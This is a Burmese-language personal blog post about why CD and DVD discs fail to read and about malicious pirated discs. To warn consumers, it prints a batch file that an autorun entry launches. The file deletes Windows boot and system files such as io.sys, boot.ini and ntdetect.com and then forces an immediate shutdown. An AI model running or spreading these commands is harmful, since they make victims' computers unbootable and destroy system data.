လောကမီးအိမ်

လောကမှာငါသိတာ တစ်ခုရှိတယ်..ထိုအရာမှာ ငါသည်ဘာမှမသိ

“CD,DVD Drives များမှဖြစ်တတ်သောအရာများ”

CD,DVD Drives များမှဖြစ်တတ်သောအရာများ

အားတာနဲ့ ဟိုတွေးဒီတွေးပြီး BOX မှာလာရေးတဲ့သူကိုပြန်ဖြေရင်း ဒီပိုစ့်ကိုရေးလိုက်တာပါ ..
အကြောင်းကတော့ CD,DVD Drive တွေကဖြစ်တတ်တဲ့ အကြောင်းလေးတွေပါ …

(၁) “CD,DVD ဖတ်မရခြင်းအကြောင်း”

တခါတလေ အခုမှပူပူနွေးနွေးဝယ်လာတဲ့ အခွေတွေသင့်ရဲ့ ကွန်ပြုတာမှာ ဖွင့်မရတာကြုံဖူးကြမှာပါ ..
ဒီလိုဖြစ်ရတာက ဝယ်လာတဲ့ပျက်လို့ ဒါမဟုတ်ကူးထားတဲ့ Speed x ကိုကိုယ့်စက်က
လိုက်မဖွင့်နိုင်လို့ ဖြစ်ပါတယ် … ပျက်တာကတော့ တပိုင်းပေါ့.. ဒါပေမယ့်
ဟိုခွေကျတော့ ဖတ်လို့ ရတယ် ဒီခွေကျတော့ဘာလို့ မရတာလဲ .. စိတ်ညစ်ရတယ်ဗျာ ..
ဖတ်မရတာကတော့ ပထမ Speed ကြောင့်ပါ .. တခါတလေ ရောင်းသူတွေက
ပြီးရင်ပြီးရောဆိုပြီး speed များများနဲ့ ကူးကြတယ် .. Speed များများနဲ့ ကူးတဲ့အခါ
မြန်မြန်ကူးနိုင်ပြီး ခွေသားကပါးပါးလေးပဲပေါ်ပါတယ် …
ဥပမာ .. CD 8x 12x 16x 24x 36x 48x စသဖြင့်
           DVD 2x 4x 6x 8x 16x ဆိုတဲ့ speed တွေနဲ့ ကူးပါတယ် …
CD ကိုကူးမယ်ဆိုရင် Data(jpeg,mp3,softwares)စတာတွေကူးရင် 16x 24x လောက်ဆိုသင့်တော်ပါတယ်..
တကယ်လို့  36x 48xတို့ နဲ့ ကူးလိုက်ရင် ခဏလေးပဲအသုံးခံပြီး ကြာလာရင်ဘာခြစ်ရာမှမရှိပဲနဲ့ 
ဖတ်လို့ မရတာဖြစ်တတ်ပါတယ် …
အဲ.. မီဒီယာအပိုင်း ရုပ်သံပါတဲ့ ဗီဒီယို ရုပ်ရှင်ခွေတွေကိုကူးမယ်ဆိုရင်တော့ 12x 16x 24x နဲ့ ဆိုသင့်တော်ပါတယ် ..
ဘာကြောင့်လဲဆိုတော့ ဒီခွေတွေကအမြဲဖတ်နေရပြီးတော့ အခြစ်ရာတွေလဲအလွယ်တကူဖြစ်နိုင်ကျလို့ ပါ …
နောက်တခုက ရုပ်သံပါတဲ့အတွက် ဖတ်တဲ့အခါပိုမိုပြီးဖတ်ရတယ်ခင်ဗျ …
DVD လဲဒီလိုပါပဲ .. Data အတွက်ဆိုရင် 8x မီဒီယာအတွက်ဆိုရင် 4x 6x 8x ပေါ့ .. ဒါကတော့ခွေကူးတဲ့
လူပေါ်မှာမူတည်ပါတယ် … မြန်မြန်ကူးတော့ပျက်မြန်သည် .. ပျက်ရင်ပြန်ဝယ်မည် … ပြန်ဝယ်တော့
အရောင်းသွက်တယ်ခင်ဗျ … ဒါပါပဲ ..

ဖတ်လို့ မရတဲ့နောက်တချက်ကတော့ ကူးတဲ့အချိန်မှာဖြစ်တာပါ … Burning Process မပြီးဆုံးခြင်းပဲ
ဖြစ်ပါတယ် … ဒီလိုမပြီးတဲ့အကြောင်းက ကွန်ပြုတာနဲ့ ကူးတဲ့အခါ အကြောင်းကြောင်းကြောင့်
ဝင်းဒိုး ပရိုဂရမ် အခွေ ကူးစက် ကြောင်ပြီးပျက်ခြင်းပါ …အဖြစ်များတာကတော့ ပရိုဂရမ်နဲ့ ကူးစက်ပဲ
ဖြစ်ပါတယ် … ပရိုဂရမ်ကျတော့ ဗိုင်းရပ်စ်ကြောင့် ဒါမှမဟုတ် ပရိုဂရမ်အတွက် လုံလောက်တဲ့
Memory free space မရှိတဲ့အတွက်ကြောင့်ပါ .. ကူးစက်ကျတော့ ကူးတဲ့မှန်ဘီလူးက
မကောင်းတဲ့အတွက်ကြောင့် ဒါမှမဟုတ် ကူးဖို့ သတ်မှတ်ထားတဲ့ Speed အတိုင်းလိုက်မကူးလို့ 
ဖြစ်တာပါ .. သိပ်မရေးနိုင်တော့တဲ့အခါမှာ  Speed တွေကခွေကိုပျက်စေတယ် … ဒါကို
ပြန်မစစ်ဆေးပဲ ဈေးကွက်တင်တော့ အပျက်တိုးပြီပေါ့ … နောက်တချက်က အလုပ်သမားကြောင့်ပါ ..
ဆိုင်ရှင်က ဒီခွေကူးဆိုပြီးလွတ်ထားလိုက်တယ် .. အခွေက ကူးရင်းနဲ့ ပျက်သွားတယ် ..
ပျက်တာသိတယ် .. ဒါပေမယ့်ဆိုင်ရှင်အကြောင်းပိုသိတဲ့ အလုပ်သမားက အပျက်ကိုအကောင်းဆိုပြီး
ရောတုတ်လုပ်လိုက်တယ် …အရောင်းသွက်ပြန်ပြီပေါ့ … (ဆိုင်နာမည်ပျက်မပျက်တော့မသိ)…
ဒါကတော့ CD,DVD ကိုဖတ်မရတဲ့အကြောင်းလေးနဲ့ ပတ်သက်ပြီး အကျဉ်းချုပ်ရေးလိုက်တာပါ …

(၂) “CD,DVD မှကျရောက်တတ်တဲ့ အန္တရယ်(ဝင်းဒိုးပြုတ်ကျသွားခြင်း) .. ဗိုင်းရပ်စ်များ”

အဲ..နောက်တခုကတော့ CD,DVD ကလာတဲ့ပြဿနာတွေပါ … တခုကတော့ ဗိုင်းရပ်စ် ..
ဒါကတော့ လွယ်ပါတယ် .. ဗိုင်းရပ်စ်ရှိတဲ့ ကွန်ပြုတာတစ်လုံးက ကူးလိုက်တဲ့ CD,DVDတွေမှာ
ဗိုင်းရပ်စ်ပါလာတတ်တယ် .. ဗိုင်းးရပ်စ်တိုင်းတော့ မဟုတ်ပါဘူး … ကွန်ပြုတာတခုလုံးကို
လည်ပတ်ခွင့် ပတ်စ်ပိုစ့်ရထားတဲ့ ဗိုင်းရပ်စ်တွေလောက်ပါပဲ … နောက်တခုကတော့
ညစ်တာဗျို့ … ဗမာတွေကတော့ ညဏ်နီညဏ်နက်တွေကတော့ကောင်းပ … သူများခွေကျတော့
ကူးပြီးရောင်းတယ် .. ကိုယ်ရောင်းတဲ့ခွေကို သူများမကူးရအောင် ဟိုလုပ်ဒီလုပ်လော့ချကြတယ် ..
လော့ချတာကိုတော့ မပြောပါဘူး … ဟိုလုပ်ဒီလုပ်ဆိုတာက ဗိုင်းရပ်စ်လို့ ခေါ်လို့ မရတဲ့ ကိုယ်ပိုင်
ကွန်မန်လေးတွေ ထည့်ထားခြင်းပဲဖြစ်ပါတယ် …ဒီအောက်က ပုံကိုကြည့်ပါ ..

AUTORUN.INF ဆိုတဲ့ဖိုင်ကတော့ ကွန်ပြုတာထဲထည့်လိုက်ရင် အော်တိုအလုပ်လုပ်အောင်
လုပ်ပေးတဲ့ကောင်ပါ … PRO.BAT ကျတော့ ကိုယ်ပိုင်ရေးထားတဲ့ကွန်မန်ပါ …
ဒီကောင်တွေ အလုပ်လုပ်ပုံကတော့ ခွေကိုကွန်ပြုတာထဲထည့်လိုက်တာနဲ့ AUTORUN.INFဆိုတဲ့
ကောင်ကအော်တိုအလုပ်လုပ်ပြီး PRO.BAT ကိုဖွင့်ပါတယ် …PRO.BATကလည်း သူမှာရေးထားတဲ့
အတိုင်း အလုပ်တွေလုပ်ပါတယ် … ဒီကောင်ဘာတွေလုပ်တာလဲ …
del c:\io.sys  ဖျက်တယ်
del c:\msdos.sys  ဖျက်တယ်
cls
del c:\windows\win.com
del c:\windows\win.ini
del c:\windows\system.ini  (ဒီကွန်မန်က မြန်မာပြည်မှာလက်ရှိသုံးနေကျတဲ့ဟာတွေပါ)
cls
del c:\winnt\winnt.*
cls
del/f/q/a -h c:\ntdetect.com
del/f/q/a -h c:\boot.ini
cls
shutdown -s -t 00 စက်ကိုပိတ်ခိုင်းတယ် … 00 ဆိုတဲ့ခဏလေးပဲ .. ခွေထည့်ပြီး ၁၀ စက္ကန့် တောင်
မကြာဘူးဗျ .. စက်ပိတ်သွားတယ် .. ကြည့်နေသူကြောင်သွားတယ် … စက်ပြန်ဖွင့်တယ် ..
ဝင်းဒိုးတက်မလာတော့ဘူး … ဝင်းဒိုးပျောက်ဆုံးသွားပြီ … ပျောက်မှာပေါ့ … ဟိုကောင်က
ဝင်းဒိုးဖွင့်မယ့် System တွေကိုဖျက်သွားတာကိုးဗျ … တေပြီ .. ဆိုင်ပြေး .. ဆိုင်ကျတော့
ဝင်းဒိုးအသစ်ပြန်တင် …အိမ်ပြန်တော့ ခွေထိုးကြည့် .. ဆိုင်ပြေး အိမ်ပြန် ခွေထိုး ဆိုင်ပြန်ပြေး …
မသိတဲ့သူတွေကို သနားမိတယ် .. ပိုက်ဆံအကုန်ခံပြီး ခွေလေးဝယ်လာပါတယ် … ဒီလိုဖြစ်လို့ 
ပိုက်ဆံထပ်ကုန်တယ် … တေပါပြီဂျ … ဒါကြောင့် ဒီလိုတွေမဖြစ်ရအောင် ကူးခွေများဆို
သတိထားပါ … ဗိုင်းရပ်စ်လည်းထိနိုင်သလို ဝင်းဒိုးလည်းကျသွားနိုင်ပါတယ် …
(ကာကွယ်တဲ့ ပုံစံကိုနောက်ပိုစ့်မှာတင်ပေးပါ့မယ်) …

ကဲ .. CD,DVD ပုံပြင်လေးကတော့ ဒီလောက်ပါပဲကွယ် … အားလုံးအဆင်ပြေပါစေခင်ည …
ညီညီ(လောကမီးအိမ်) …

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: